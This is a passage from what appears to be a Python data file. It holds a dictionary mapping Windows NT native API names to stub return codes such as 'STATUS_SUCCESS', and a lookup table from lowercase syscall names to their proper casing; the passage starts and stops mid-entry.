'STATUS_SUCCESS', 'NtFindAtom': 'STATUS_SUCCESS', 'NtQueryInformationAtom': 'STATUS_SUCCESS', 'RtlCompressBuffer': 'STATUS_SUCCESS', 'RtlDecompressBuffer': 'STATUS_SUCCESS', 'RtlGetCompressionWorkSpaceSize': 'STATUS_SUCCESS', 'DbgPrint': 'STATUS_SUCCESS', 'NtSystemDebugControl': 'STATUS_SUCCESS', 'RtlCaptureStackBackTrace': 'S_OK', 'RtlGetCallersAddress': 'S_OK', 'NtDisplayString': 'STATUS_SUCCESS', 'NtRaiseException': 'STATUS_SUCCESS', 'NtRaiseHardError': 'STATUS_SUCCESS', 'NtSetDefaultHardErrorPort': 'STATUS_SUCCESS', 'NtQuerySystemEnvironmentValue': 'STATUS_SUCCESS', 'NtSetSystemEnvironmentValue': 'STATUS_SUCCESS', 'RtlCreateEnvironment': 'STATUS_SUCCESS', 'RtlDestroyEnvironment': 'S_OK', 'RtlExpandEnvironmentStrings_U': 'STATUS_SUCCESS', 'RtlQueryEnvironmentVariable_U': 'STATUS_SUCCESS', 'RtlSetCurrentEnvironment': 'S_OK', 'RtlSetEnvironmentVariable': 'STATUS_SUCCESS', 'LdrGetDllHandle': 'STATUS_SUCCESS', 'LdrGetProcedureAddress': 'STATUS_SUCCESS', 'LdrLoadDll': 'STATUS_SUCCESS', 'LdrQueryProcessModuleInformation': 'STATUS_SUCCESS', 'LdrShutdownProcess': 'S_OK', 'LdrShutdownThread': 'S_OK', 'LdrUnloadDll': 'STATUS_SUCCESS', 'NtLoadDriver': 'STATUS_SUCCESS', 'NtUnloadDriver': 'STATUS_SUCCESS', 'RtlImageNtHeader': 'S_OK', 'RtlImageRvaToVa': 'S_OK', 'NtFlushWriteBuffer': 'STATUS_SUCCESS', 'NtShutdownSystem': 'STATUS_SUCCESS', 'NtQueryDefaultLocale': 'STATUS_SUCCESS', 'NtSetDefaultLocale': 'STATUS_SUCCESS', 'RtlAllocateHeap': 'S_OK', 'RtlCompactHeap': 'S_OK', 'RtlCreateHeap': 'S_OK', 'RtlDestroyHeap': 'STATUS_SUCCESS', 'RtlEnumProcessHeaps': 'STATUS_SUCCESS', 'RtlFreeHeap': 'S_OK', 'RtlGetProcessHeaps': 'S_OK', 'RtlLockHeap': 'S_OK', 'RtlProtectHeap': 'S_OK', 'RtlReAllocateHeap': 'S_OK', 'RtlSizeHeap': 'S_OK', 'RtlUnlockHeap': 'S_OK', 'RtlValidateHeap': 'S_OK', 'RtlValidateProcessHeaps': 'S_OK', 'RtlWalkHeap': 'STATUS_SUCCESS', 'NtAllocateVirtualMemory': 'STATUS_SUCCESS', 'NtFlushVirtualMemory': 'STATUS_SUCCESS', 'NtFreeVirtualMemory': 'STATUS_SUCCESS', 'NtLockVirtualMemory': 'STATUS_SUCCESS', 'NtProtectVirtualMemory': 'STATUS_SUCCESS', 'NtQueryVirtualMemory': 'STATUS_SUCCESS', 'NtReadVirtualMemory': 'STATUS_SUCCESS', 'NtUnlockVirtualMemory': 'STATUS_SUCCESS', 'NtWriteVirtualMemory': 'STATUS_SUCCESS', 'NtQuerySecurityObject': 'STATUS_SUCCESS', 'NtSetSecurityObject': 'STATUS_SUCCESS', 'NtDuplicateObject': 'STATUS_SUCCESS', 'NtMakeTemporaryObject': 'STATUS_SUCCESS', 'NtQueryObject': 'STATUS_SUCCESS', 'NtSetInformationObject': 'STATUS_SUCCESS', 'NtSignalAndWaitForSingleObject': 'STATUS_SUCCESS', 'NtWaitForMultipleObjects': 'STATUS_SUCCESS', 'NtWaitForSingleObject': 'STATUS_SUCCESS', 'NtCreateDebugObject': 'STATUS_SUCCESS', 'NtDebugActiveProcess': 'STATUS_SUCCESS', 'NtRemoveProcessDebug': 'STATUS_SUCCESS', 'NtCreateDirectoryObject': 'STATUS_SUCCESS', 'NtOpenDirectoryObject': 'STATUS_SUCCESS', 'NtQueryDirectoryObject': 'STATUS_SUCCESS', 'NtClearEvent': 'STATUS_SUCCESS', 'NtCreateEvent': 'STATUS_SUCCESS', 'NtOpenEvent': 'STATUS_SUCCESS', 'NtPulseEvent': 'STATUS_SUCCESS', 'NtQueryEvent': 'STATUS_SUCCESS', 'NtResetEvent': 'STATUS_SUCCESS', 'NtSetEvent': 'STATUS_SUCCESS', 'NtSetEventBoostPriority': 'STATUS_SUCCESS', 'NtCreateEventPair': 'STATUS_SUCCESS', 'NtOpenEventPair': 'STATUS_SUCCESS', 'NtSetHighEventPair': 'STATUS_SUCCESS', 'NtSetHighWaitLowEventPair': 'STATUS_SUCCESS', 'NtSetHighWaitLowThread': 'STATUS_SUCCESS', 'NtSetLowEventPair': 'STATUS_SUCCESS', 'NtSetLowWaitHighEventPair': 'STATUS_SUCCESS', 'NtSetLowWaitHighThread': 'STATUS_SUCCESS', 'NtWaitHighEventPair': 'STATUS_SUCCESS', 'NtWaitLowEventPair': 'STATUS_SUCCESS', 'NtCancelIoFile': 'STATUS_SUCCESS', 'NtCreateFile': 'STATUS_SUCCESS', 'NtCreateMailslotFile': 'STATUS_SUCCESS', 'NtCreateNamedPipeFile': 'STATUS_SUCCESS', 'NtCreatePagingFile': 'STATUS_SUCCESS', 'NtDeleteFile': 'STATUS_SUCCESS', 'NtDeviceIoControlFile': 'STATUS_SUCCESS', 'NtFlushBuffersFile': 'STATUS_SUCCESS', 'NtFsControlFile': 'STATUS_SUCCESS', 'NtLockFile': 'STATUS_SUCCESS', 'NtNotifyChangeDirectoryFile': 'STATUS_SUCCESS', 'NtOpenFile': 'STATUS_SUCCESS', 'NtQueryAttributesFile': 'STATUS_SUCCESS', 'NtQueryDirectoryFile': 'STATUS_SUCCESS', 'NtQueryEaFile': 'STATUS_SUCCESS', 'NtQueryFullAttributesFile': 'STATUS_SUCCESS', 'NtQueryInformationFile': 'STATUS_SUCCESS', 'NtQueryOleDirectoryFile': 'STATUS_SUCCESS', 'NtQueryVolumeInformationFile': 'STATUS_SUCCESS', 'NtReadFile': 'STATUS_SUCCESS', 'NtReadFileScatter': 'STATUS_SUCCESS', 'NtSetEaFile': 'STATUS_SUCCESS', 'NtSetInformationFile': 'STATUS_SUCCESS', 'NtSetVolumeInformationFile': 'STATUS_SUCCESS', 'NtUnlockFile': 'STATUS_SUCCESS', 'NtWriteFile': 'STATUS_SUCCESS', 'NtWriteFileGather': 'STATUS_SUCCESS', 'NtCreateIoCompletion': 'STATUS_SUCCESS', 'NtOpenIoCompletion': 'STATUS_SUCCESS', 'NtQueryIoCompletion': 'STATUS_SUCCESS', 'NtRemoveIoCompletion': 'STATUS_SUCCESS', 'NtSetIoCompletion': 'STATUS_SUCCESS', 'NtCompactKeys': 'STATUS_SUCCESS', 'NtCompressKey': 'STATUS_SUCCESS', 'NtCreateKey': 'STATUS_SUCCESS', 'NtDeleteKey': 'STATUS_SUCCESS', 'NtDeleteValueKey': 'STATUS_SUCCESS', 'NtEnumerateKey': 'STATUS_SUCCESS', 'NtEnumerateValueKey': 'STATUS_SUCCESS', 'NtFlushKey': 'STATUS_SUCCESS', 'NtLoadKey': 'STATUS_SUCCESS', 'NtLoadKey2': 'STATUS_SUCCESS', 'NtNotifyChangeKey': 'STATUS_SUCCESS', 'NtOpenKey': 'STATUS_SUCCESS', 'NtQueryKey': 'STATUS_SUCCESS', 'NtQueryMultipleValueKey': 'STATUS_SUCCESS', 'NtQueryValueKey': 'STATUS_SUCCESS', 'NtReplaceKey': 'STATUS_SUCCESS', 'NtRestoreKey': 'STATUS_SUCCESS', 'NtSaveKey': 'STATUS_SUCCESS', 'NtSetInformationKey': 'STATUS_SUCCESS', 'NtSetValueKey': 'STATUS_SUCCESS', 'NtUnloadKey': 'STATUS_SUCCESS', 'RtlFormatCurrentUserKeyPath': 'STATUS_SUCCESS', 'NtCreateKeyedEvent': 'STATUS_SUCCESS', 'NtReleaseKeyedEvent': 'STATUS_SUCCESS', 'NtWaitForKeyedEvent': 'STATUS_SUCCESS', 'NtCreateMutant': 'STATUS_SUCCESS', 'NtOpenMutant': 'STATUS_SUCCESS', 'NtQueryMutant': 'STATUS_SUCCESS', 'NtReleaseMutant': 'STATUS_SUCCESS', 'NtAcceptConnectPort': 'STATUS_SUCCESS', 'NtCompleteConnectPort': 'STATUS_SUCCESS', 'NtConnectPort': 'STATUS_SUCCESS', 'NtCreatePort': 'STATUS_SUCCESS', 'NtImpersonateClientOfPort': 'STATUS_SUCCESS', 'NtListenPort': 'STATUS_SUCCESS', 'NtQueryInformationPort': 'STATUS_SUCCESS', 'NtReadRequestData': 'STATUS_SUCCESS', 'NtReplyPort': 'STATUS_SUCCESS', 'NtReplyWaitReceivePort': 'STATUS_SUCCESS', 'NtReplyWaitReplyPort': 'STATUS_SUCCESS', 'NtRequestPort': 'STATUS_SUCCESS', 'NtRequestWaitReplyPort': 'STATUS_SUCCESS', 'NtWriteRequestData': 'STATUS_SUCCESS', 'NtCreateProcess': 'STATUS_SUCCESS', 'NtFlushInstructionCache': 'STATUS_SUCCESS', 'NtOpenProcess': 'STATUS_SUCCESS', 'NtQueryInformationProcess': 'STATUS_SUCCESS', 'NtSetInformationProcess': 'STATUS_SUCCESS', 'NtTerminateProcess': 'STATUS_SUCCESS', 'RtlCreateUserProcess': 'STATUS_SUCCESS', 'NtCreateProfile': 'STATUS_SUCCESS', 'NtQueryIntervalProfile': 'STATUS_SUCCESS', 'NtSetIntervalProfile': 'STATUS_SUCCESS', 'NtStartProfile': 'STATUS_SUCCESS', 'NtStopProfile': 'STATUS_SUCCESS', 'NtCreateSection': 'STATUS_SUCCESS', 'NtExtendSection': 'STATUS_SUCCESS', 'NtMapViewOfSection': 'STATUS_SUCCESS', 'NtOpenSection': 'STATUS_SUCCESS', 'NtQuerySection': 'STATUS_SUCCESS', 'NtUnmapViewOfSection': 'STATUS_SUCCESS', 'NtCreateSemaphore': 'STATUS_SUCCESS', 'NtOpenSemaphore': 'STATUS_SUCCESS', 'NtQuerySemaphore': 'STATUS_SUCCESS', 'NtReleaseSemaphore': 'STATUS_SUCCESS', 'NtCreateSymbolicLinkObject': 'STATUS_SUCCESS', 'NtOpenSymbolicLinkObject': 'STATUS_SUCCESS', 'NtQuerySymbolicLinkObject': 'STATUS_SUCCESS', 'NtAlertResumeThread': 'STATUS_SUCCESS', 'NtContinue': 'STATUS_SUCCESS', 'NtCreateThread': 'STATUS_SUCCESS', 'NtCurrentTeb': 'S_OK', 'NtDelayExecution': 'STATUS_SUCCESS', 'NtImpersonateThread': 'STATUS_SUCCESS', 'NtOpenThread': 'STATUS_SUCCESS', 'NtQueryInformationThread': 'STATUS_SUCCESS', 'NtRegisterThreadTerminatePort': 'STATUS_SUCCESS', 'NtResumeThread': 'STATUS_SUCCESS', 'NtSetInformationThread': 'STATUS_SUCCESS', 'NtSuspendThread': 'STATUS_SUCCESS', 'NtTerminateThread': 'STATUS_SUCCESS', 'NtYieldExecution': 'STATUS_SUCCESS', 'RtlCreateUserThread': 'STATUS_SUCCESS', 'NtCancelTimer': 'STATUS_SUCCESS', 'NtCreateTimer': 'STATUS_SUCCESS', 'NtOpenTimer': 'STATUS_SUCCESS', 'NtQueryTimer': 'STATUS_SUCCESS', 'NtSetTimer': 'STATUS_SUCCESS', 'NtAdjustGroupsToken': 'STATUS_SUCCESS', 'NtAdjustPrivilegesToken': 'STATUS_SUCCESS', 'NtCreateToken': 'STATUS_SUCCESS', 'NtDuplicateToken': 'STATUS_SUCCESS', 'NtOpenProcessToken': 'STATUS_SUCCESS', 'NtOpenThreadToken': 'STATUS_SUCCESS', 'NtQueryInformationToken': 'STATUS_SUCCESS', 'NtSetInformationToken': 'STATUS_SUCCESS', 'NtAccessCheckAndAuditAlarm': 'STATUS_SUCCESS', 'NtCloseObjectAuditAlarm': 'STATUS_SUCCESS', 'NtDeleteObjectAuditAlarm': 'STATUS_SUCCESS', 'NtOpenObjectAuditAlarm': 'STATUS_SUCCESS', 'NtPrivilegeObjectAuditAlarm': 'STATUS_SUCCESS', 'NtPrivilegedServiceAuditAlarm': 'STATUS_SUCCESS', 'NtAccessCheck': 'STATUS_SUCCESS', 'NtAllocateLocallyUniqueId': 'STATUS_SUCCESS', 'NtAllocateUuids': 'STATUS_SUCCESS', 'NtPrivilegeCheck': 'STATUS_SUCCESS', 'NtQuerySystemInformation': 'STATUS_SUCCESS', 'NtSetSystemInformation': 'STATUS_SUCCESS', 'NtGetTickCount': 'S_OK', 'NtQueryPerformanceCounter': 'STATUS_SUCCESS', 'NtQuerySystemTime': 'STATUS_SUCCESS', 'NtQueryTimerResolution': 'STATUS_SUCCESS', 'NtSetSystemTime': 'STATUS_SUCCESS', 'NtSetTimerResolution': 'STATUS_SUCCESS', 'RtlTimeFieldsToTime': 'S_OK', 'RtlTimeToTimeFields': 'S_OK', 'NtAllocateVirtualMemory': 'STATUS_SUCCESS', 'NtClose': 'STATUS_SUCCESS', 'NtCreateFile': 'STATUS_SUCCESS', 'NtCreateSection': 'STATUS_SUCCESS', 'NtDeviceIoControlFile': 'STATUS_SUCCESS', 'NtDuplicateToken': 'STATUS_SUCCESS', 'NtFlushBuffersFileEx': 'STATUS_SUCCESS', 'NtFreeVirtualMemory': 'STATUS_SUCCESS', 'NtFsControlFile': 'STATUS_SUCCESS', 'NtLockFile': 'STATUS_SUCCESS', 'NtOpenFile': 'STATUS_SUCCESS', 'NtOpenProcessToken': 'STATUS_SUCCESS', 'NtOpenProcessTokenEx': 'STATUS_SUCCESS', 'NtOpenThreadToken': 'STATUS_SUCCESS', 'NtOpenThreadTokenEx': 'STATUS_SUCCESS', 'NtPrivilegeCheck': 'STATUS_SUCCESS', 'NtQueryDirectoryFile': 'STATUS_SUCCESS', 'NtQueryDirectoryFileEx': 'STATUS_SUCCESS', 'NtQueryInformationFile': 'STATUS_SUCCESS', 'NtQueryInformationToken': 'STATUS_SUCCESS', 'NtQueryObject': 'STATUS_SUCCESS', 'NtQueryQuotaInformationFile': 'STATUS_SUCCESS', 'NtQuerySecurityObject': 'STATUS_SUCCESS', 'NtQueryVirtualMemory': 'STATUS_SUCCESS', 'NtQueryVolumeInformationFile': 'STATUS_SUCCESS', 'NtReadFile': 'STATUS_SUCCESS', 'NtSetInformationFile': 'STATUS_SUCCESS', 'NtSetInformationThread': 'STATUS_SUCCESS', 'NtSetInformationToken': 'STATUS_SUCCESS', 'NtSetQuotaInformationFile': 'STATUS_SUCCESS', 'NtSetSecurityObject': 'STATUS_SUCCESS', 'NtUnlockFile': 'STATUS_SUCCESS', 'NtWriteFile': 'STATUS_SUCCESS'}\r\n\r\nsyscallLowerLookupDict={\"ntacceptconnectport\":\"NtAcceptConnectPort\",\"ntaccesscheck\":\"NtAccessCheck\",\"ntaccesscheckandauditalarm\":\"NtAccessCheckAndAuditAlarm\",\"ntaccesscheckbytype\":\"NtAccessCheckByType\",\"ntaccesscheckbytypeandauditalarm\":\"NtAccessCheckByTypeAndAuditAlarm\",\"ntaccesscheckbytyperesultlist\":\"NtAccessCheckByTypeResultList\",\"ntaccesscheckbytyperesultlistandauditalarm\":\"NtAccessCheckByTypeResultListAndAuditAlarm\",\"ntaccesscheckbytyperesultlistandauditalarmbyhandle\":\"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\",\"ntacquirecrossvmmutant\":\"NtAcquireCrossVmMutant\",\"ntacquireprocessactivityreference\":\"NtAcquireProcessActivityReference\",\"ntaddatom\":\"NtAddAtom\",\"ntaddatomex\":\"NtAddAtomEx\",\"ntaddbootentry\":\"NtAddBootEntry\",\"ntadddriverentry\":\"NtAddDriverEntry\",\"ntadjustgroupstoken\":\"NtAdjustGroupsToken\",\"ntadjustprivilegestoken\":\"NtAdjustPrivilegesToken\",\"ntadjusttokenclaimsanddevicegroups\":\"NtAdjustTokenClaimsAndDeviceGroups\",\"ntalertresumethread\":\"NtAlertResumeThread\",\"ntalertthread\":\"NtAlertThread\",\"ntalertthreadbythreadid\":\"NtAlertThreadByThreadId\",\"ntallocatelocallyuniqueid\":\"NtAllocateLocallyUniqueId\",\"ntallocatereserveobject\":\"NtAllocateReserveObject\",\"ntallocateuserphysicalpages\":\"NtAllocateUserPhysicalPages\",\"ntallocateuserphysicalpagesex\":\"NtAllocateUserPhysicalPagesEx\",\"ntallocateuuids\":\"NtAllocateUuids\",\"ntallocatevirtualmemory\":\"NtAllocateVirtualMemory\",\"ntallocatevirtualmemoryex\":\"NtAllocateVirtualMemoryEx\",\"ntalpcacceptconnectport\":\"NtAlpcAcceptConnectPort\",\"ntalpccancelmessage\":\"NtAlpcCancelMessage\",\"ntalpcconnectport\":\"NtAlpcConnectPort\",\"ntalpcconnectportex\":\"NtAlpcConnectPortEx\",\"ntalpccreateport\":\"NtAlpcCreatePort\",\"ntalpccreateportsection\":\"NtAlpcCreatePortSection\",\"ntalpccreateresourcereserve\":\"NtAlpcCreateResourceReserve\",\"ntalpccreatesectionview\":\"NtAlpcCreateSectionView\",\"ntalpccreatesecuritycontext\":\"NtAlpcCreateSecurityContext\",\"ntalpcdeleteportsection\":\"NtAlpcDeletePortSection\",\"ntalpcdeleteresourcereserve\":\"NtAlpcDeleteResourceReserve\",\"ntalpcdeletesectionview\":\"NtAlpcDeleteSectionView\",\"ntalpcdeletesecuritycontext\":\"NtAlpcDeleteSecurityContext\",\"ntalpcdisconnectport\":\"NtAlpcDisconnectPort\",\"ntalpcimpersonateclientcontainerofport\":\"NtAlpcImpersonateClientContainerOfPort\",\"ntalpcimpersonateclientofport\":\"NtAlpcImpersonateClientOfPort\",\"ntalpcopensenderprocess\":\"NtAlpcOpenSenderProcess\",\"ntalpcopensenderthread\":\"NtAlpcOpenSenderThread\",\"ntalpcqueryinformation\":\"NtAlpcQueryInformation\",\"ntalpcqueryinformationmessage\":\"NtAlpcQueryInformationMessage\",\"ntalpcrevokesecuritycontext\":\"NtAlpcRevokeSecurityContext\",\"ntalpcsendwaitreceiveport\":\"NtAlpcSendWaitReceivePort\",\"ntalpcsetinformation\":\"NtAlpcSetInformation\",\"ntapphelpcachecontrol\":\"NtApphelpCacheControl\",\"ntaremappedfilesthesame\":\"NtAreMappedFilesTheSame\",\"ntassignprocesstojobobject\":\"NtAssignProcessToJobObject\",\"ntassociatewaitcompletionpacket\":\"NtAssociateWaitCompletionPacket\",\"ntcallenclave\":\"NtCallEnclave\",\"ntcallbackreturn\":\"NtCallbackReturn\",\"ntcanceliofile\":\"NtCancelIoFile\",\"ntcanceliofileex\":\"NtCancelIoFileEx\",\"ntcancelsynchronousiofile\":\"NtCancelSynchronousIoFile\",\"ntcanceltimer\":\"NtCancelTimer\",\"ntcanceltimer2\":\"NtCancelTimer2\",\"ntcancelwaitcompletionpacket\":\"NtCancelWaitCompletionPacket\",\"ntchangeprocessstate\":\"NtChangeProcessState\",\"ntchangethreadstate\":\"NtChangeThreadState\",\"ntclearevent\":\"NtClearEvent\",\"ntclose\":\"NtClose\",\"ntcloseobjectauditalarm\":\"NtCloseObjectAuditAlarm\",\"ntcommitcomplete\":\"NtCommitComplete\",\"ntcommitenlistment\":\"NtCommitEnlistment\",\"ntcommitregistrytransaction\":\"NtCommitRegistryTransaction\",\"ntcommittransaction\":\"NtCommitTransaction\",\"ntcompactkeys\":\"NtCompactKeys\",\"ntcompareobjects\":\"NtCompareObjects\",\"ntcomparesigninglevels\":\"NtCompareSigningLevels\",\"ntcomparetokens\":\"NtCompareTokens\",\"ntcompleteconnectport\":\"NtCompleteConnectPort\",\"ntcompresskey\":\"NtCompressKey\",\"ntconnectport\":\"NtConnectPort\",\"ntcontinue\":\"NtContinue\",\"ntcontinueex\":\"NtContinueEx\",\"ntconvertbetweenauxiliarycounterandperformancecounter\":\"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\",\"ntcreatecrossvmevent\":\"NtCreateCrossVmEvent\",\"ntcreatecrossvmmutant\":\"NtCreateCrossVmMutant\",\"ntcreatedebugobject\":\"NtCreateDebugObject\",\"ntcreatedirectoryobject\":\"NtCreateDirectoryObject\",\"ntcreatedirectoryobjectex\":\"NtCreateDirectoryObjectEx\",\"ntcreateenclave\":\"NtCreateEnclave\",\"ntcreateenlistment\":\"NtCreateEnlistment\",\"ntcreateevent\":\"NtCreateEvent\",\"ntcreateeventpair\":\"NtCreateEventPair\",\"ntcreatefile\":\"NtCreateFile\",\"ntcreateirtimer\":\"NtCreateIRTimer\",\"ntcreateiocompletion\":\"NtCreateIoCompletion\",\"ntcreateioring\":\"NtCreateIoRing\",\"ntcreatejobobject\":\"NtCreateJobObject\",\"ntcreatejobset\":\"NtCreateJobSet\",\"ntcreatekey\":\"NtCreateKey\",\"ntcreatekeytransacted\":\"NtCreateKeyTransacted\",\"ntcreatekeyedevent\":\"NtCreateKeyedEvent\",\"ntcreatelowboxtoken\":\"NtCreateLowBoxToken\",\"ntcreatemailslotfile\":\"NtCreateMailslotFile\",\"ntcreatemutant\":\"NtCreateMutant\",\"ntcreatenamedpipefile\":\"NtCreateNamedPipeFile\",\"ntcreatepagingfile\":\"NtCreatePagingFile\",\"ntcreatepartition\":\"NtCreatePartition\",\"ntcreateport\":\"NtCreatePort\",\"ntcreateprivatenamespace\":\"NtCreatePrivateNamespace\",\"ntcreateprocess\":\"NtCreateProcess\",\"ntcreateprocessex\":\"NtCreateProcessEx\",\"ntcreateprocessstatechange\":\"NtCreateProcessStateChange\",\"ntcreateprofile\":\"NtCreateProfile\",\"ntcreateprofileex\":\"NtCreateProfileEx\",\"ntcreateregistrytransaction\":\"NtCreateRegistryTransaction\",\"ntcreateresourcemanager\":\"NtCreateResourceManager\",\"ntcreatesection\":\"NtCreateSection\",\"ntcreatesectionex\":\"NtCreateSectionEx\",\"ntcreatesemaphore\":\"NtCreateSemaphore\",\"ntcreatesymboliclinkobject\":\"NtCreateSymbolicLinkObject\",\"ntcreatethread\":\"NtCreateThread\",\"ntcreatethreadex\":\"NtCreateThreadEx\",\"ntcreatethreadstatechange\":\"NtCreateThreadStateChange\",\"ntcreatetimer\":\"NtCreateTimer\",\"ntcreatetimer2\":\"NtCreateTimer2\",\"ntcreatetoken\":\"NtCreateToken\",\"ntcreatetokenex\":\"NtCreateTokenEx\",\"ntcreatetransaction\":\"NtCreateTransaction\",\"ntcreatetransactionmanager\":\"NtCreateTransactionManager\",\"ntcreateuserprocess\":\"NtCreateUserProcess\",\"ntcreatewaitcompletionpacket\":\"NtCreateWaitCompletionPacket\",\"ntcreatewaitableport\":\"NtCreateWaitablePort\",\"ntcreatewnfstatename\":\"NtCreateWnfStateName\",\"ntcreateworkerfactory\":\"NtCreateWorkerFactory\",\"ntdebugactiveprocess\":\"NtDebugActiveProcess\",\"ntdebugcontinue\":\"NtDebugContinue\",\"ntdelayexecution\":\"NtDelayExecution\",\"ntdeleteatom\":\"NtDeleteAtom\",\"ntdeletebootentry\":\"NtDeleteBootEntry\",\"ntdeletedriverentry\":\"NtDeleteDriverEntry\",\"ntdeletefile\":\"NtDeleteFile\",\"ntdeletekey\":\"NtDeleteKey\",\"ntdeleteobjectauditalarm\":\"NtDeleteObjectAuditAlarm\",\"ntdeleteprivatenamespace\":\"NtDeletePrivateNamespace\",\"ntdeletevaluekey\":\"NtDeleteValueKey\",\"ntdeletewnfstatedata\":\"NtDeleteWnfStateData\",\"ntdeletewnfstatename\":\"NtDeleteWnfStateName\",\"ntdeviceiocontrolfile\":\"NtDeviceIoControlFile\",\"ntdirectgraphicscall\":\"NtDirectGraphicsCall\",\"ntdisablelastknowngood\":\"NtDisableLastKnownGood\",\"ntdisplaystring\":\"NtDisplayString\",\"ntdrawtext\":\"NtDrawText\",\"ntduplicateobject\":\"NtDuplicateObject\",\"ntduplicatetoken\":\"NtDuplicateToken\",\"ntenablelastknowngood\":\"NtEnableLastKnownGood\",\"ntenumeratebootentries\":\"NtEnumerateBootEntries\",\"ntenumeratedriverentries\":\"NtEnumerateDriverEntries\",\"ntenumeratekey\":\"NtEnumerateKey\",\"ntenumeratesystemenvironmentvaluesex\":\"NtEnumerateSystemEnvironmentValuesEx\",\"ntenumeratetransactionobject\":\"NtEnumerateTransactionObject\",\"ntenumeratevaluekey\":\"NtEnumerateValueKey\",\"ntextendsection\":\"NtExtendSection\",\"ntfilterbootoption\":\"NtFilterBootOption\",\"ntfiltertoken\":\"NtFilterToken\",\"ntfiltertokenex\":\"NtFilterTokenEx\",\"ntfindatom\":\"NtFindAtom\",\"ntflushbuffersfile\":\"NtFlushBuffersFile\",\"ntflushbuffersfileex\":\"NtFlushBuffersFileEx\",\"ntflushinstalluilanguage\":\"NtFlushInstallUILanguage\",\"ntflushinstructioncache\":\"NtFlushInstructionCache\",\"ntflushkey\":\"NtFlushKey\",\"ntflushprocesswritebuffers\":\"NtFlushProcessWriteBuffers\",\"ntflushvirtualmemory\":\"NtFlushVirtualMemory\",\"ntflushwritebuffer\":\"NtFlushWriteBuffer\",\"ntfreeuserphysicalpages\":\"NtFreeUserPhysicalPages\",\"ntfreevirtualmemory\":\"NtFreeVirtualMemory\",\"ntfreezeregistry\":\"NtFreezeRegistry\",\"ntfreezetransactions\":\"NtFreezeTransactions\",\"ntfscontrolfile\":\"NtFsControlFile\",\"ntgetcachedsigninglevel\":\"NtGetCachedSigningLevel\",\"ntgetcompletewnfstatesubscription\":\"NtGetCompleteWnfStateSubscription\",\"ntgetcontextthread\":\"NtGetContextThread\",\"ntgetcurrentprocessornumber\":\"NtGetCurrentProcessorNumber\",\"ntgetcurrentprocessornumberex\":\"NtGetCurrentProcessorNumberEx\",\"ntgetdevicepowerstate\":\"NtGetDevicePowerState\",\"ntgetmuiregistryinfo\":\"NtGetMUIRegistryInfo\",\"ntgetnextprocess\":\"NtGetNextProcess\",\"ntgetnextthread\":\"NtGetNextThread\",\"ntgetnlssectionptr\":\"NtGetNlsSectionPtr\",\"ntgetnotificationresourcemanager\":\"NtGetNotificationResourceManager\",\"ntgetwritewatch\":\"NtGetWriteWatch\",\"ntimpersonateanonymoustoken\":\"NtImpersonateAnonymousToken\",\"ntimpersonateclientofport\":\"NtImpersonateClientOfPort\",\"ntimpersonatethread\":\"NtImpersonateThread\",\"ntinitializeenclave\":\"NtInitializeEnclave\",\"ntinitializenlsfiles\":\"NtInitializeNlsFiles\",\"ntinitializeregistry\":\"NtInitializeRegistry\",\"ntinitiatepoweraction\":\"NtInitiatePowerAction\",\"ntisprocessinjob\":\"NtIsProcessInJob\",\"ntissystemresumeautomatic\":\"NtIsSystemResumeAutomatic\",\"ntisuilanguagecomitted\":\"NtIsUILanguageComitted\",\"ntlistenport\":\"NtListenPort\",\"ntloaddriver\":\"NtLoadDriver\",\"ntloadenclavedata\":\"NtLoadEnclaveData\",\"ntloadkey\":\"NtLoadKey\",\"ntloadkey2\":\"NtLoadKey2\",\"ntloadkey3\":\"NtLoadKey3\",\"ntloadkeyex\":\"NtLoadKeyEx\",\"ntlockfile\":\"NtLockFile\",\"ntlockproductactivationkeys\":\"NtLockProductActivationKeys\",\"ntlockregistrykey\":\"NtLockRegistryKey\",\"ntlockvirtualmemory\":\"NtLockVirtualMemory\",\"ntmakepermanentobject\":\"NtMakePermanentObject\",\"ntmaketemporaryobject\":\"NtMakeTemporaryObject\",\"ntmanagehotpatch\":\"NtManageHotPatch\",\"ntmanagepartition\":\"NtManagePartition\",\"ntmapcmfmodule\":\"NtMapCMFModule\",\"ntmapuserphysicalpages\":\"NtMapUserPhysicalPages\",\"ntmapuserphysicalpagesscatter\":\"NtMapUserPhysicalPagesScatter\",\"ntmapviewofsection\":\"NtMapViewOfSection\",\"ntmapviewofsectionex\":\"NtMapViewOfSectionEx\",\"ntmodifybootentry\":\"NtModifyBootEntry\",\"ntmodifydriverentry\":\"NtModifyDriverEntry\",\"ntnotifychangedirectoryfile\":\"NtNotifyChangeDirectoryFile\",\"ntnotifychangedirectoryfileex\":\"NtNotifyChangeDirectoryFileEx\",\"ntnotifychangekey\":\"NtNotifyChangeKey\",\"ntnotifychangemultiplekeys\":\"NtNotifyChangeMultipleKeys\",\"ntnotifychangesession\":\"NtNotifyChangeSession\",\"ntopendirectoryobject\":\"NtOpenDirectoryObject\",\"ntopenenlistment\":\"NtOpenEnlistment\",\"ntopenevent\":\"NtOpenEvent\",\"ntopeneventpair\":\"NtOpenEventPair\",\"ntopenfile\":\"NtOpenFile\",\"ntopeniocompletion\":\"NtOpenIoCompletion\",\"ntopenjobobject\":\"NtOpenJobObject\",\"ntopenkey\":\"NtOpenKey\",\"ntopenkeyex\":\"NtOpenKeyEx\",\"ntopenkeytransacted\":\"NtOpenKeyTransacted\",\"ntopenkeytransactedex\":\"NtOpenKeyTransactedEx\",\"ntopenkeyedevent\":\"NtOpenKeyedEvent\",\"ntopenmutant\":\"NtOpenMutant\",\"ntopenobjectauditalarm\":\"NtOpenObjectAuditAlarm\",\"ntopenpartition\":\"NtOpenPartition\",\"ntopenprivatenamespace\":\"NtOpenPrivateNamespace\",\"ntopenprocess\":\"NtOpenProcess\",\"ntopenprocesstoken\":\"NtOpenProcessToken\",\"ntopenprocesstokenex\":\"NtOpenProcessTokenEx\",\"ntopenregistrytransaction\":\"NtOpenRegistryTransaction\",\"ntopenresourcemanager\":\"NtOpenResourceManager\",\"ntopensection\":\"NtOpenSection\",\"ntopensemaphore\":\"NtOpenSemaphore\",\"ntopensession\":\"NtOpenSession\",\"ntopensymboliclinkobject\":\"NtOpenSymbolicLinkObject\",\"ntopenthread\":\"NtOpenThread\",\"ntopenthreadtoken\":\"NtOpenThreadToken\",\"ntopenthreadtokenex\":\"NtOpenThreadTokenEx\",\"ntopentimer\":\"NtOpenTimer\",\"ntopentransaction\":\"NtOpenTransaction\",\"ntopentransactionmanager\":\"NtOpenTransactionManager\",\"ntplugplaycontrol\":\"NtPlugPlayControl\",\"ntpowerinformation\":\"NtPowerInformation\",\"nt